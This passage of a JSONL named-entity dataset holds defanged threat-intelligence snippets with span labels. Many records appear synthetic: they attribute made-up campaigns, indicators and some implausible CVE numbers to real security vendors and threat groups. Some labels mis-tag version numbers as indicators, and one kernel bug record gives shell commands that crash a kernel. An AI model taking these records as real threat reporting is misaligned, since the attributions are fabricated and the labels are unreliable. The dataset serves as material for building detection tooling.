A backup C2 server was identified at 58[.]148[.]68[.]119.", "spans": {"Organization: FireEye": [[0, 7]], "Vulnerability: CVE-2020-48698": [[99, 113]], "System: Barracuda ESG": [[117, 130]], "Malware: Lumma Stealer": [[155, 168]], "Indicator: 140.241.76.94": [[220, 239]], "Indicator: portal-mail.io": [[244, 262]], "Indicator: hxxp://data-static.top/panel/index.html": [[304, 347]], "Indicator: 3e53f8b989435e5f98f75ecaee4922b736b44e850fdf9719ff280fc6fb2cf3b6": [[377, 441]], "Indicator: security@document-share.link": [[518, 550]], "Indicator: 58.148.68.119": [[616, 635]]}, "info": {"id": "synth_v2_00154", "source": "defanged_augment"}} {"text": "In Wagtail before versions 2.7.3 and 2.8.2, a potential timing attack exists on pages or documents that have been protected with a shared password through Wagtail's \"Privacy\" controls. This password check is performed through a character-by-character string comparison, and so an attacker who is able to measure the time taken by this check to a high degree of accuracy could potentially use timing differences to gain knowledge of the password. This is [understood to be feasible on a local network, but not on the public internet](hxxps://groups[ . ]google[ . ]com/d/msg/django-developers/iAaq0pvHXuA/fpUuwjK3i2wJ).\n\nPrivacy settings that restrict access to pages/documents on a per-user or per-group basis (as opposed to a shared password) are unaffected by this vulnerability.\n\nThis has been patched in 2.7.3, 2.8.2, 2.9.", "spans": {"Indicator: https://groups.google.com/d/msg/django-developers/iAaq0pvHXuA/fpUuwjK3i2wJ": [[533, 615]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-11037"}} {"text": "ALERT: Mimikatz detected on Nginx endpoint. Process C:\\Users\\Public\\Libraries\\shell.ps1 (MD5: 78a8258631abcaf49dde4311227bd06b) initiated outbound connection to 204[.]243[.]141[.]43 resolving cert-verify[[.]]dev. 
Immediate containment recommended.", "spans": {"Malware: Mimikatz": [[7, 15]], "System: Nginx": [[28, 33]], "Indicator: 78a8258631abcaf49dde4311227bd06b": [[94, 126]], "Indicator: 204.243.141.43": [[161, 181]], "Indicator: cert-verify[.]dev": [[192, 211]]}, "info": {"id": "synth_00023", "source": "defanged_augment"}} {"text": "Blog Post by Rapid7: Tracking Volt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-46781 against Cisco ASA deployments. The initial access vector involves spear-phishing emails from admin@secure-verify[ . ]net delivering QakBot. Post-compromise, the attackers deploy DanaBot and use SharpHound for reconnaissance. C2 infrastructure includes 34[.]197[.]204[.]215 and data-auth[.]site. A staging server at hxxp://backup-cdn[.]dev/wp-content/uploads/doc.php hosts additional tooling. Key artifact: /dev/shm/chrome_helper.exe (SHA256: 8a7790351e3a349454b62034b153635b13f6bcd13923e54cbd5432af1eaa804f).", "spans": {"Organization: Rapid7": [[13, 19]], "Vulnerability: CVE-2020-46781": [[122, 136]], "System: Cisco ASA": [[145, 154]], "Indicator: admin@secure-verify.net": [[230, 257]], "Malware: QakBot": [[269, 275]], "Malware: DanaBot": [[315, 322]], "Indicator: 34.197.204.215": [[389, 409]], "Indicator: data-auth.site": [[414, 430]], "Indicator: hxxp://backup-cdn.dev/wp-content/uploads/doc.php": [[452, 502]], "Indicator: 8a7790351e3a349454b62034b153635b13f6bcd13923e54cbd5432af1eaa804f": [[579, 643]]}, "info": {"id": "synth_v2_01578", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Recorded Future identified a large-scale phishing operation. Emails originated from confirm@account-update[ . ]xyz and finance@document-share[.]link, spoofing legitimate services. Victims were directed to hxxps://cachedata[.]cc/callback which hosted a credential harvesting page on nodecloud[.]club. 
A secondary link hxxps://mail-data[.]top/api/v2/auth delivered ShadowPad (SHA256: 85cc003f56ae70bca4bd18b039f25c7b4e2f3a739a651567d33e972e033958be). The malware was saved to /var/tmp/svchost.exe and established C2 with 207 [ . ] 106 [ . ] 242 [ . ] 34.", "spans": {"Organization: Recorded Future": [[26, 41]], "Indicator: confirm@account-update.xyz": [[110, 140]], "Indicator: finance@document-share.link": [[145, 174]], "Indicator: hxxps://cachedata.cc/callback": [[231, 262]], "Indicator: nodecloud.club": [[308, 324]], "Indicator: hxxps://mail-data.top/api/v2/auth": [[343, 378]], "Malware: ShadowPad": [[389, 398]], "Indicator: 85cc003f56ae70bca4bd18b039f25c7b4e2f3a739a651567d33e972e033958be": [[408, 472]], "Indicator: 207.106.242.34": [[545, 577]]}, "info": {"id": "synth_v2_01046", "source": "defanged_augment"}} {"text": "In this scenario , the domain cdnverify[.]net was registered on January 30 , 2018 and just two days later , an attack was launched using this domain as a C2 .", "spans": {"Indicator: cdnverify.net": [[30, 45]]}, "info": {"id": "cyberner_stix_train_007114", "source": "defanged_augment"}} {"text": "In addition , at this stage the app can process one of these commands : • Collect device info • Install app • Is online ? APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet . Inside the binaries the compiler left references to the names of the C source file modules used: operation_reg[.]c , thread_command[.]c and thread_upload[.]c . 
What makes COSMICENERGY unique is that based on our analysis , a contractor may have developed it as a red teaming tool for simulated power disruption exercises hosted by Rostelecom - Solar , a Russian cyber security company .", "spans": {"Organization: aviation companies": [[189, 207]], "Indicator: operation_reg.c": [[454, 471]], "Indicator: thread_command.c": [[474, 492]], "Indicator: thread_upload.c": [[497, 514]], "Malware: COSMICENERGY": [[528, 540]], "Organization: Rostelecom - Solar": [[688, 706]], "Organization: Russian cyber security company": [[711, 741]]}, "info": {"id": "cyberner_stix_train_001054", "source": "defanged_augment"}} {"text": "Automated botnet fingerprinting identified two high-threat command-and-control nodes. IP 79 [ . ] 127 [ . ] 138 [ . ] 77 (fingerprint 9f96b00ce11bc787) and IP 3[.]236[.]224[.]33 (fingerprint fce59ecbc730e00a) both received threat scores of 95/100. The C2 panels were accessible at hxxp://79[.]127[.]138[.]77:8080/panel and hxxp://3[ . ]236[ . ]224[ . ]33:9090/admin. Both nodes serve as relay infrastructure for distributing DDoS payloads.", "spans": {"Indicator: 79.127.138.77": [[89, 120]], "Indicator: 3.236.224.33": [[159, 177]], "Indicator: http://79.127.138.77:8080/panel": [[281, 318]], "Indicator: http://3.236.224.33:9090/admin": [[323, 365]]}, "info": {"id": "otx_00037", "source": "defanged_augment"}} {"text": "Suspected TEMP.Veles incidents include malicious activity originating from 87 [ . ] 245 [ . ] 143 [ . ] 140 , which is registered to CNIIHM .", "spans": {"Indicator: 87.245.143.140": [[75, 107]], "Organization: CNIIHM": [[133, 139]]}, "info": {"id": "cyberner_stix_train_003985", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2023-40294 is a critical type confusion affecting Cisco ASA. Recorded Future confirmed active exploitation by Aqua Blizzard in the wild. Exploitation delivers Vidar (MD5: 470ea820abeb27a8f99694b9064e5318) which is dropped to /dev/shm/update.dll. 
The exploit payload is hosted at hxxp://static-gateway[ . ]io/gate.php and communicates to 10 [ . ] 255 [ . ] 138 [ . ] 203 for C2.", "spans": {"Vulnerability: CVE-2023-40294": [[24, 38]], "Vulnerability: type confusion": [[53, 67]], "System: Cisco ASA": [[78, 87]], "Organization: Recorded Future": [[89, 104]], "Malware: Vidar": [[187, 192]], "Indicator: 470ea820abeb27a8f99694b9064e5318": [[199, 231]], "Indicator: hxxp://static-gateway.io/gate.php": [[307, 344]], "Indicator: 10.255.138.203": [[365, 397]]}, "info": {"id": "synth_v2_00740", "source": "defanged_augment"}} {"text": "That domain, electronicfrontierfoundation[ . ]org, is designed to trick users into a false sense of trust and it appears to have been used in a spear phishing attack, though it is unclear who the intended targets were.", "spans": {"Indicator: electronicfrontierfoundation.org": [[13, 49]]}, "info": {"id": "cyner2_train_000301", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Win32.Antilam.gzgw Backdoor.Trojan Antilam.FE BKDR_ANTILAM.A Backdoor.Win32.Antilam.20.b Backdoor.Antilam!vJ4jD43D2/o NORMAL:Trojan.SERVER_3!27802 Backdoor.Win32.Antilam.dfer BackDoor.AntiLame.23 BKDR_ANTILAM.A BehavesLike[ . ]Win32[ . ]Backdoor[ . ]cc W32/Risk.BTKH-4955 Backdoor/Antilam.20.ao BDS/Antilam.20.C Trojan[Backdoor]/Win32.Antilam Backdoor:Win32/Antilam.20.B Trojan/Win32.Xema Backdoor.AntiLamer Win32/Antilam.20.B Backdoor.Win32.Antilam W32/Antilam.B!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.cc": [[244, 285]]}, "info": {"id": "cyner2_train_001592", "source": "defanged_augment"}} {"text": "The group's Cobalt Strike installation typically uses a payload named svchost[.]exe in an attempt to disguise Cobalt Strike activity as the legitimate Windows svchost[ . 
]exe executable .", "spans": {"Indicator: svchost.exe": [[70, 83], [159, 174]], "System: Windows": [[151, 158]]}, "info": {"id": "cyberner_stix_train_004481", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 154 [ . ] 169 [ . ] 171 [ . ] 158, the Proofpoint IR team identified NjRAT running as /tmp/helper.sh. The threat actor, believed to be Sandworm, used PowerView for credential harvesting and PowerShell Empire for lateral movement. Exfiltrated data was sent to cdnproxy[.]xyz and data-data[.]online. The initial dropper (SHA1: edb04ccfb4ef20ac3fa5bbf206ab7c1f1528799a) was delivered via a phishing email from billing@identity-verify[.]cc. A second C2 node was observed at 108 [ . ] 168 [ . ] 83 [ . ] 27, with a persistence mechanism writing to /dev/shm/winlogon.exe.", "spans": {"Indicator: 154.169.171.158": [[64, 97]], "Organization: Proofpoint": [[103, 113]], "Malware: NjRAT": [[133, 138]], "Indicator: cdnproxy.xyz": [[323, 337]], "Indicator: data-data.online": [[342, 360]], "Indicator: edb04ccfb4ef20ac3fa5bbf206ab7c1f1528799a": [[389, 429]], "Indicator: billing@identity-verify.cc": [[471, 499]], "Indicator: 108.168.83.27": [[534, 565]]}, "info": {"id": "synth_v2_00301", "source": "defanged_augment"}} {"text": "How do you know if your Google account is breached ? You can check if your account is compromised by accessing the following web site that we created : https : //gooligan[ . ]checkpoint[ . ]com/ .", "spans": {"Organization: Google": [[24, 30]], "Indicator: gooligan.checkpoint.com": [[162, 193]]}, "info": {"id": "cyner2_train_002531", "source": "defanged_augment"}} {"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . 
Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor[.]Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx .", "spans": {"Organization: governments": [[137, 148]], "Organization: militaries": [[151, 161]], "Organization: defense attaches": [[164, 180]], "Organization: media entities": [[183, 197]], "Organization: dissidents": [[204, 214]], "Organization: figures": [[219, 226]], "Organization: Symantec": [[271, 279]], "Malware: Trojan.Naid": [[343, 354]], "Indicator: Backdoor.Moudoor": [[359, 377]], "Malware: Aurora": [[396, 402]]}, "info": {"id": "cyberner_stix_train_003880", "source": "defanged_augment"}} {"text": "Why Did Chinese Spyware Linger in U.S . After almost two weeks , on August 30 , 2018 , APT10 attackers used their access to the network to move laterally and made their first deployment of an RC4- and Salsa20-encrypted variant of the Trochilus malware using a previously associated DLL sideloading techniquE . The message asked the recipient to rename the attachment extension from “ [ . ]_X_ ” to “ .exe ” and opening it with the password specified in the email to view the Happy New Year eCard in the correct and polite language .", "spans": {"Indicator: ._X_": [[384, 392]]}, "info": {"id": "cyberner_stix_train_005540", "source": "defanged_augment"}} {"text": "Blog Post by Zscaler ThreatLabz: Tracking Granite Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-24446 against VMware ESXi deployments. The initial access vector involves spear-phishing emails from finance@account-update[ . ]xyz delivering PikaBot. Post-compromise, the attackers deploy AgentTesla and use Rubeus for reconnaissance. C2 infrastructure includes 135[.]158[.]221[.]9 and portal-cloud[ . ]io. A staging server at hxxp://cache-portal[.]club/panel/index.html hosts additional tooling. 
Key artifact: C:\\Windows\\Temp\\agent.py (SHA1: 32ad0456a4bb79c0707c23630c427901e8e2bca7).", "spans": {"Organization: Zscaler ThreatLabz": [[13, 31]], "Vulnerability: CVE-2021-24446": [[137, 151]], "System: VMware ESXi": [[160, 171]], "Indicator: finance@account-update.xyz": [[247, 277]], "Malware: PikaBot": [[289, 296]], "Malware: AgentTesla": [[336, 346]], "Indicator: 135.158.221.9": [[409, 428]], "Indicator: portal-cloud.io": [[433, 452]], "Indicator: http://cache-portal.club/panel/index.html": [[474, 517]], "Indicator: 32ad0456a4bb79c0707c23630c427901e8e2bca7": [[590, 630]]}, "info": {"id": "synth_v2_01518", "source": "defanged_augment"}} {"text": "We can observe below , the procedure through which the artifact attempts to establish a connection with the IP address 176 [ . ] 31 [ . ] 112 [ . ] 10 .", "spans": {"Indicator: 176.31.112.10": [[119, 150]]}, "info": {"id": "cyberner_stix_train_002734", "source": "defanged_augment"}} {"text": "Cisco Talos detected a multi-stage attack chain. The initial phishing email from billing@secure-verify[ . ]net contained a link to hxxps://securemail[.]club/panel/index.html. This redirected to hxxp://securecache[.]xyz/login on edgelogin[.]live. A secondary email from contact@credential-check[ . ]site pointed to hxxp://securemail[.]live/assets/js/payload.js which delivered RedLine Stealer. The final payload callback was hxxps://portal-update[ . ]io/secure/token resolving to 218 [ . ] 10 [ . ] 32 [ . ] 22 via gateway-login[ . 
]link.", "spans": {"Organization: Cisco Talos": [[0, 11]], "Indicator: billing@secure-verify.net": [[81, 110]], "Indicator: https://securemail.club/panel/index.html": [[131, 173]], "Indicator: http://securecache.xyz/login": [[194, 224]], "Indicator: edgelogin.live": [[228, 244]], "Indicator: contact@credential-check.site": [[269, 302]], "Indicator: http://securemail.live/assets/js/payload.js": [[314, 359]], "Malware: RedLine Stealer": [[376, 391]], "Indicator: hxxps://portal-update.io/secure/token": [[424, 465]], "Indicator: 218.10.32.22": [[479, 509]], "Indicator: gateway-login.link": [[514, 536]]}, "info": {"id": "synth_v2_01704", "source": "defanged_augment"}} {"text": "Officials at BLU could n't be immediately reached for comment . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . C2 : phot[.]healthsvsolu[.]com .", "spans": {"Organization: BLU": [[13, 16]], "Vulnerability: CVE-2018-0798": [[186, 199]], "Indicator: phot.healthsvsolu.com": [[231, 256]]}, "info": {"id": "cyberner_stix_train_006370", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed BloodHound artifacts at /var/tmp/config.dat. Memory dump analysis confirmed execution of Chisel. Registry modifications pointed to persistence via C:\\ProgramData\\config.dat. Network forensics identified connections to 192 [ . ] 102 [ . ] 223 [ . ] 60 and api-edge[.]dev. Email headers traced the initial vector to security@auth-check[ . ]org. File /home/user/.config/agent.py (SHA256: 0db4e25ab6261020a90b47f8866da6e56b157a6c42a5d30f250229de2874a693) was identified as the initial dropper. A staging URL hxxps://cachestorage[ . ]cc/assets/js/payload.js resolved to 165 [ . ] 11 [ . ] 128 [ . ] 24. 
Secondary artifact hash: SHA1: 9b44b0196a748264807df2046678bf9b3a23f7df.", "spans": {"Indicator: 192.102.223.60": [[290, 322]], "Indicator: api-edge.dev": [[327, 341]], "Indicator: security@auth-check.org": [[386, 413]], "Indicator: 0db4e25ab6261020a90b47f8866da6e56b157a6c42a5d30f250229de2874a693": [[457, 521]], "Indicator: hxxps://cachestorage.cc/assets/js/payload.js": [[576, 624]], "Indicator: 165.11.128.24": [[637, 668]], "Indicator: 9b44b0196a748264807df2046678bf9b3a23f7df": [[701, 741]]}, "info": {"id": "synth_v2_01296", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing/hist: Fix out-of-bound write on 'action_data.var_ref_idx'\n\nWhen generate a synthetic event with many params and then create a trace\naction for it [1], kernel panic happened [2].\n\nIt is because that in trace_action_create() 'data->n_params' is up to\nSYNTH_FIELDS_MAX (current value is 64), and array 'data->var_ref_idx'\nkeeps indices into array 'hist_data->var_refs' for each synthetic event\nparam, but the length of 'data->var_ref_idx' is TRACING_MAP_VARS_MAX\n(current value is 16), so out-of-bound write happened when 'data->n_params'\nmore than 16. 
In this case, 'data->match_data.event' is overwritten and\neventually cause the panic.\n\nTo solve the issue, adjust the length of 'data->var_ref_idx' to be\nSYNTH_FIELDS_MAX and add sanity checks to avoid out-of-bound write.\n\n[1]\n # cd /sys/kernel/tracing/\n # echo \"my_synth_event int v1; int v2; int v3; int v4; int v5; int v6;\\\nint v7; int v8; int v9; int v10; int v11; int v12; int v13; int v14;\\\nint v15; int v16; int v17; int v18; int v19; int v20; int v21; int v22;\\\nint v23; int v24; int v25; int v26; int v27; int v28; int v29; int v30;\\\nint v31; int v32; int v33; int v34; int v35; int v36; int v37; int v38;\\\nint v39; int v40; int v41; int v42; int v43; int v44; int v45; int v46;\\\nint v47; int v48; int v49; int v50; int v51; int v52; int v53; int v54;\\\nint v55; int v56; int v57; int v58; int v59; int v60; int v61; int v62;\\\nint v63\" >> synthetic_events\n # echo 'hist:keys=pid:ts0=common_timestamp.usecs if comm==\"bash\"' >> \\\nevents/sched/sched_waking/trigger\n # echo \"hist:keys=next_pid:onmatch(sched.sched_waking).my_synth_event(\\\npid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,\\\npid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,\\\npid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,\\\npid,pid,pid,pid,pid,pid,pid,pid,pid)\" >> events/sched/sched_switch/trigger\n\n[2]\nBUG: unable to handle page fault for address: ffff91c900000000\nPGD 61001067 P4D 61001067 PUD 0\nOops: 0000 [#1] PREEMPT SMP NOPTI\nCPU: 2 PID: 322 Comm: bash Tainted: G W 6.1.0-rc8+ #229\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\nrel-1[ . ]15[ . ]0-0-g2dd4b9b3f840-prebuilt[ . ]qemu[ . 
]org 04/01/2014\nRIP: 0010:strcmp+0xc/0x30\nCode: 75 f7 31 d2 44 0f b6 04 16 44 88 04 11 48 83 c2 01 45 84 c0 75 ee\nc3 cc cc cc cc 0f 1f 00 31 c0 eb 08 48 83 c0 01 84 d2 74 13 <0f> b6 14\n07 3a 14 06 74 ef 19 c0 83 c8 01 c3 cc cc cc cc 31 c3\nRSP: 0018:ffff9b3b00f53c48 EFLAGS: 00000246\nRAX: 0000000000000000 RBX: ffffffffba958a68 RCX: 0000000000000000\nRDX: 0000000000000010 RSI: ffff91c943d33a90 RDI: ffff91c900000000\nRBP: ffff91c900000000 R08: 00000018d604b529 R09: 0000000000000000\nR10: ffff91c9483eddb1 R11: ffff91ca483eddab R12: ffff91c946171580\nR13: ffff91c9479f0538 R14: ffff91c9457c2848 R15: ffff91c9479f0538\nFS: 00007f1d1cfbe740(0000) GS:ffff91c9bdc80000(0000)\nknlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffff91c900000000 CR3: 0000000006316000 CR4: 00000000000006e0\nCall Trace:\n \n __find_event_file+0x55/0x90\n action_create+0x76c/0x1060\n event_hist_trigger_parse+0x146d/0x2060\n ? event_trigger_write+0x31/0xd0\n trigger_process_regex+0xbb/0x110\n event_trigger_write+0x6b/0xd0\n vfs_write+0xc8/0x3e0\n ? alloc_fd+0xc0/0x160\n ? preempt_count_add+0x4d/0xa0\n ? 
preempt_count_add+0x70/0xa0\n ksys_write+0x5f/0xe0\n do_syscall_64+0x3b/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\nRIP: 0033:0x7f1d1d0cf077\nCode: 64 89 02 48 c7 c0 ff ff ff ff eb bb 0f 1f 80 00 00 00 00 f3 0f 1e\nfa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 01 00 00 00 0f 05 <48> 3d 00\nf0 ff ff 77 51 c3 48 83 ec 28 48 89 54 24 18 48 89 74\nRSP: 002b:00007ffcebb0e568 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000000143 RCX: 00007f1d1d0cf077\nRDX: 0000000000000143 RSI: 00005639265aa7e0 RDI: 0000000000000001\nRBP: 00005639265aa7e0 R08: 000000000000000a R09: 0000000000000142\nR\n---truncated---", "spans": {"Indicator: rel-1.15.0-0-g2dd4b9b3f840-prebuilt.qemu.org": [[2233, 2293]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[2188, 2192]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-50553"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172[.]246[.]158[.]145, the Symantec IR team identified Conti running as /opt/app/bin/chrome_helper.exe. The threat actor, believed to be MuddyWater, used Chisel for credential harvesting and Impacket for lateral movement. Exfiltrated data was sent to login-node[ . ]top and relayrelay[ . ]org. The initial dropper (SHA256: dca8da1f07404dcd18245ffee064ce6ac6fef092fb7a3aa59c5e06743240cfe4) was delivered via a phishing email from service@auth-check[.]org. A second C2 node was observed at 87 [ . ] 193 [ . ] 243 [ . 
] 214, with a persistence mechanism writing to C:\\Program Files\\Common Files\\lsass.dmp.", "spans": {"Indicator: 172.246.158.145": [[64, 85]], "Organization: Symantec": [[91, 99]], "Malware: Conti": [[119, 124]], "Indicator: login-node.top": [[315, 333]], "Indicator: relayrelay.org": [[338, 356]], "Indicator: dca8da1f07404dcd18245ffee064ce6ac6fef092fb7a3aa59c5e06743240cfe4": [[387, 451]], "Indicator: service@auth-check.org": [[493, 517]], "Indicator: 87.193.243.214": [[552, 584]]}, "info": {"id": "synth_v2_00286", "source": "defanged_augment"}} {"text": "The adware functionality is the same in all the apps we analyzed . Kaspersky also observed some activity from Gaza Team and MuddyWater . Here is the complete list of files internally used by the RAT: error[ . ]tmp (the log file of the keylogger) tedsul[ . ]ocx helpsol[ . ]ocx trepsl[ . ]ocx psltred[ . ]ocx solhelp[.]ocx sulted[.]ocx .", "spans": {"Organization: Kaspersky": [[67, 76]], "Indicator: error.tmp": [[200, 213]], "Indicator: tedsul.ocx": [[246, 260]], "Indicator: helpsol.ocx": [[261, 276]], "Indicator: trepsl.ocx": [[277, 291]], "Indicator: psltred.ocx": [[292, 307]], "Indicator: solhelp.ocx": [[308, 321]], "Indicator: sulted.ocx": [[322, 334]]}, "info": {"id": "cyberner_stix_train_001340", "source": "defanged_augment"}} {"text": "However , a simple Google search for the adware package name returned a “ TestDelete ” project that had been available in his repository at some point The malicious developer also has apps in Apple ’ s App Store . The malware then writes the R resource data to the file C:\\WINDOWS\\tasksche.exe . 
Filename: conhote[.]dll .", "spans": {"Organization: Google": [[19, 25]], "Organization: Apple": [[192, 197]], "System: App Store": [[202, 211]], "Malware: malware": [[218, 225]], "Malware: file": [[265, 269]], "Malware: C:\\WINDOWS\\tasksche.exe": [[270, 293]], "Indicator: conhote.dll": [[306, 319]]}, "info": {"id": "cyberner_stix_train_001136", "source": "defanged_augment"}} {"text": "] 144 [ . APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea . In the case of old Windows versions like XP , main module events[.]exe runs an edited XPTask[ . ]vbs Microsoft sample script to create a weekly scheduled task for . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": {"System: Windows": [[161, 168]], "System: XP": [[183, 185]], "Indicator: events.exe": [[200, 212]], "Indicator: XPTask.vbs": [[228, 242]], "Organization: Microsoft": [[243, 252]]}, "info": {"id": "cyberner_stix_train_001234", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.AppdataAdobLnrC.Trojan Net-Worm.Win32.Cynic!O Worm.Cynic Worm.Cynic.Win32.96 Win32.Trojan.WisdomEyes.16070401.9500.9997 Net-Worm.Win32.Cynic.iu Trojan.Win32.Bot.crrkzb BackDoor.IRC.Bot.1244 BehavesLike.Win32.Downloader.ct TR/Zbot.var Worm[Net]/Win32.Cynic Worm:Win32/Vexral.A Trojan.Barys.657 Worm[.]Win32[.]A[.]Net-Cynic.95744 Net-Worm.Win32.Cynic.iu Trojan/Win32.IRCBot.R23264 Worm.Cynic Win32/AutoRun.IRCBot.II Trojan.Injector!y7pxtOpaO3Y Net-Worm.Win32.Cynic W32/Injector.HXK!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Worm.Win32.A.Net": [[323, 345]]}, "info": {"id": "cyner2_train_004368", "source": "defanged_augment"}} {"text": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0 [ . ] 9 [ . ] 8 [ . ] 923. Authentication is not required to exploit this vulnerability. 
The specific flaw exists within ajax_dashboard.php. When parsing the service_start parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9719.", "spans": {"Indicator: 0.9.8.923": [[123, 150]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-15435"}} {"text": "Malware Analysis Report: Hive (MD5: b73d1d39467e447cdea82a221faee369). Upon execution on Ubuntu 22.04, the sample creates /var/tmp/sam.hive and injects into legitimate processes. Network analysis shows beaconing to 172 [ . ] 77 [ . ] 218 [ . ] 141 every 60 seconds and DNS queries to cloudupdate[.]net. The second stage was fetched from hxxp://cdn-sync[.]club/api/v2/auth and written to C:\\Users\\admin\\Downloads\\beacon.dll. The payload uses Metasploit-style techniques for defense evasion. A secondary hash (SHA1: 76aa029a5d5258ca206d2e10dbd108961db3dadb) was extracted from the unpacked payload.", "spans": {"Malware: Hive": [[25, 29]], "Indicator: b73d1d39467e447cdea82a221faee369": [[36, 68]], "System: Ubuntu 22.04": [[89, 101]], "Indicator: 172.77.218.141": [[215, 247]], "Indicator: cloudupdate.net": [[284, 301]], "Indicator: http://cdn-sync.club/api/v2/auth": [[337, 371]], "Indicator: 76aa029a5d5258ca206d2e10dbd108961db3dadb": [[514, 554]]}, "info": {"id": "synth_v2_00606", "source": "defanged_augment"}} {"text": "ESET detects this adware , collectively , as Android/AdDisplay.Ashas . In January , Kaspersky identified new activity by the Transparent Tribe APT group aka PROJECTM and MYTHIC LEOPARD , a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets . 
The malware configuration contains one Command and Control: pactchfilepacks[.]net23[.]net .", "spans": {"Organization: ESET": [[0, 4]], "Malware: Android/AdDisplay.Ashas": [[45, 68]], "Organization: Kaspersky": [[84, 93]], "Organization: military": [[283, 291]], "Indicator: pactchfilepacks.net23.net": [[362, 391]]}, "info": {"id": "cyberner_stix_train_005679", "source": "defanged_augment"}} {"text": "Vulnerability in the Enterprise Manager for Oracle Database product of Oracle Enterprise Manager (component: Target Management). Supported versions that are affected are 12 [ . ] 1 [ . ] 0 [ . ] 5, 13[.]2[.]0[.]0 and 13[.]3[.]0[.]0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Enterprise Manager for Oracle Database. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Enterprise Manager for Oracle Database accessible data as well as unauthorized update, insert or delete access to some of Enterprise Manager for Oracle Database accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Enterprise Manager for Oracle Database. CVSS 3.0 Base Score 6.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L).", "spans": {"Indicator: 12.1.0.5": [[170, 196]], "Indicator: 13.2.0.0": [[198, 212]], "Indicator: 13.3.0.0": [[217, 231]], "System: Oracle Database": [[44, 59], [364, 379], [522, 537], [644, 659], [778, 793]], "Organization: Oracle": [[71, 77]], "Vulnerability: denial of service": [[720, 737]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2640"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: Fix infinite recursion in fib6_dump_done().\n\nsyzkaller reported infinite recursive calls of fib6_dump_done() during\nnetlink socket destruction. 
[1]\n\nFrom the log, syzkaller sent an AF_UNSPEC RTM_GETROUTE message, and then\nthe response was generated. The following recvmmsg() resumed the dump\nfor IPv6, but the first call of inet6_dump_fib() failed at kzalloc() due\nto the fault injection. [0]\n\n 12:01:34 executing program 3:\n r0 = socket$nl_route(0x10, 0x3, 0x0)\n sendmsg$nl_route(r0, ... snip ...)\n recvmmsg(r0, ... snip ...) (fail_nth: 8)\n\nHere, fib6_dump_done() was set to nlk_sk(sk)->cb.done, and the next call\nof inet6_dump_fib() set it to nlk_sk(sk)->cb.args[3]. syzkaller stopped\nreceiving the response halfway through, and finally netlink_sock_destruct()\ncalled nlk_sk(sk)->cb.done().\n\nfib6_dump_done() calls fib6_dump_end() and nlk_sk(sk)->cb.done() if it\nis still not NULL. fib6_dump_end() rewrites nlk_sk(sk)->cb.done() by\nnlk_sk(sk)->cb.args[3], but it has the same function, not NULL, calling\nitself recursively and hitting the stack guard page.\n\nTo avoid the issue, let's set the destructor after kzalloc().\n\n[0]:\nFAULT_INJECTION: forcing a failure.\nname failslab, interval 1, probability 0, space 0, times 0\nCPU: 1 PID: 432110 Comm: syz-executor.3 Not tainted 6.8.0-12821-g537c2e91d354-dirty #11\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[ . ]16[ . ]0-0-gd239552ce722-prebuilt[ . ]qemu[ . 
